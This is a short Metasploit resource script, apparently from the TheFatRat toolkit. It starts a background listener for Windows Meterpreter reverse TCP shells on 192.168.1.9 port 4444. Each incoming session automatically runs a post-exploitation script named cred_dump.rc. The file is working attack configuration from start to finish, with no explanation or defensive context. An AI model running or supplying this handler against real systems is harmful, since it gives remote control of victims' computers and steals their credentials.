use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.9
set LPORT 4444
set AutoRunScript multi_console_command -r /home/test/hack/TheFatRat/postexploit/cred_dump.rc
set ExitOnSession false
exploit -j
